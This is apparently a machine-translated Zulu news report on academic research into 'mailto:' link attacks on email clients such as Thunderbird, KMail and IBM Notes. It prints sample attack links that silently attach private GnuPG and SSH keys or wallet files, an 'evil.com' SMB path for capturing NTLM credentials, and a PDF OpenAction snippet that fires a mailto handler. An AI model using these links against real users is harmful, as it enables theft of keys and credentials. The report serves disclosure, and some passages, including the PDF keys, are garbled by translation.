Abacwaningi abavela e-Ruhr University Bochum (Germany) () ukuziphatha kwamaklayenti e-imeyili lapho ecubungula izixhumanisi ze-“mailto:” ezinamapharamitha athuthukile. Amaklayenti e-imeyili amahlanu kwangamashumi amabili ahloliwe abesengozini yokuhlaselwa okuye kwashintsha insiza kusetshenziswa ipharamitha "yokunamathisela". Amaklayenti e-imeyili engeziwe ayisithupha abesengozini yokuhlaselwa kokhiye we-PGP kanye ne-S/MIME, futhi amakhasimende amathathu abesengozini yokuhlaselwa ukuze akhiphe okuqukethwe kwemilayezo ebethelwe.
Izixhumanisi «"zisetshenziselwa ukuvula iklayenti le-imeyili ngokuzenzakalelayo ukuze ubhale incwadi eya kulowo obhalelwayo eshiwo kusixhumanisi. Ngokungeziwe ekhelini, ungacacisa amapharamitha engeziwe njengengxenye yesixhumanisi, njengesihloko sencwadi kanye nesifanekiso sokuqukethwe okuvamile. Ukuhlasela okuhlongozwayo kuxhaphaza ipharamitha "yokunamathisela", ekuvumela ukuthi unamathisele okunamathiselwe kumlayezo okhiqiziwe.
Amakhasimende e-imeyili i-Thunderbird, i-GNOME Evolution (CVE-2020-11879), i-KDE KMail (CVE-2020-11880), i-IBM/HCL Notes (CVE-2020-4089) kanye ne-Pegasus Mail babesengozini yokuhlaselwa okuncane okukuvumela ukuthi unamathisele ngokuzenzakalelayo. noma yiliphi ifayela lasendaweni, elicaciswe ngesixhumanisi esifana ne-“mailto:?attach=path_to_file”. Ifayela linamathiselwe ngaphandle kokubonisa isixwayiso, ngakho ngaphandle kokunaka okukhethekile, umsebenzisi angase angaboni ukuthi incwadi izothunyelwa nokunamathiselwe.
Isibonelo, usebenzisa isixhumanisi esifana ne-“mailto:[i-imeyili ivikelwe]&subject=Title&body=Text&attach=~/.gnupg/secring.gpg" ungafaka okhiye abayimfihlo besuka ku-GnuPG kuhlamvu. Ungakwazi futhi ukuthumela okuqukethwe kwama-crypto wallet (~/.bitcoin/wallet.dat), okhiye be-SSH (~/.ssh/id_rsa) nanoma imaphi amafayela afinyeleleka kumsebenzisi. Ngaphezu kwalokho, i-Thunderbird ikuvumela ukuthi unamathisele amaqembu wamafayela ngemaski usebenzisa izakhiwo ezifana nokuthi "namathisela=/tmp/*.txt".
Ngokungeziwe kumafayela endawo, amanye amaklayenti e-imeyili acubungula izixhumanisi zokulondoloza inethiwekhi nezindlela kuseva ye-IMAP. Ikakhulukazi, Amanothi e-IBM akuvumela ukuthi udlulise ifayela kusuka kunkomba yenethiwekhi lapho ucubungula izixhumanisi ezinjengokuthi “namathisela=\\evil.com\dummyfile”, futhi ubambe imingcele yokuqinisekisa ye-NTLM ngokuthumela isixhumanisi kuseva ye-SMB elawulwa umhlaseli. (isicelo sizothunyelwa kanye nomsebenzisi wamapharamitha wokuqinisekisa wamanje).
I-Thunderbird icubungula ngempumelelo izicelo ezifana nokuthi “attach=imap:///fetch>UID>/INBOX>1/”, ekuvumela ukuthi unamathisele okuqukethwe okusuka kumafolda akuseva ye-IMAP. Ngesikhathi esifanayo, imilayezo ebuyisiwe ku-IMAP, ebethelwe nge-OpenPGP kanye ne-S/MIME, isuswa ukubethela ngokuzenzakalelayo iklayenti lemeyili ngaphambi kokuyithumela. Abathuthukisi beThunderbird babe mayelana nenkinga ngoFebhuwari nasohlwini inkinga isilungisiwe (amagatsha e-Thunderbird 52, 60 kanye nama-68 ahlala esengozini).
Izinguqulo ezindala ze-Thunderbird nazo zazisengozini kwezinye izinhlobo ezimbili zokuhlasela ku-PGP ne-S/MIME ehlongozwe abacwaningi. Ikakhulukazi, i-Thunderbird, kanye ne-OutLook, PostBox, eM Client, MailMate kanye ne-R2Mail2, yayingaphansi kokuhlaselwa okuyinhloko, okubangelwa ukuthi iklayenti lemeyili lingenisa ngokuzenzakalelayo futhi lifaka izitifiketi ezintsha ezithunyelwa emilayezweni ye-S/MIME, evumela umhlaseli ukuhlela ukushintshwa kokhiye basesidlangalaleni asebegcinwe ngumsebenzisi.
Ukuhlasela kwesibili, lapho i-Thunderbird, i-PostBox kanye ne-MailMate okungenwa khona kalula, ilawula izici zendlela yokulondoloza ngokuzenzakalelayo imilayezo esalungiswa futhi ivumela, kusetshenziswa amapharamitha we-mailto, ukuqalisa ukuqanjwa kwemiyalezo ebethelwe noma ukwengezwa kwesiginesha yedijithali yemilayezo engaqondakali, ukudluliswa okulandelayo komphumela kuseva ye-IMAP yomhlaseli. Kulokhu kuhlasela, i-ciphertext idluliselwa ngepharamitha "yomzimba", futhi umaka othi "meta refresh" usetshenziselwa ukuqalisa ikholi kuseva ye-IMAP yomhlaseli. Ngokwesibonelo: ' '
Ukucubungula ngokuzenzakalelayo izixhumanisi ze-“mailto:" ngaphandle kokusebenzisana nabasebenzisi, imibhalo ye-PDF eklanywe ngokukhethekile ingasetshenziswa - isenzo se-OpenAction ku-PDF sikuvumela ukuthi uqalise ngokuzenzakalelayo isibambi se-mailto lapho uvula idokhumenti:
%PDF-1.5
1 0obj
<< /Type /Catalog /OpenAction [2 0 R] >>
endobj
2 0obj
<< /Uhlobo /Isenzo /S /URI/URI (mailto:?body=——QALA UMLAYEZO WE-PGP——[…])>>
endobj
Source: opennet.ru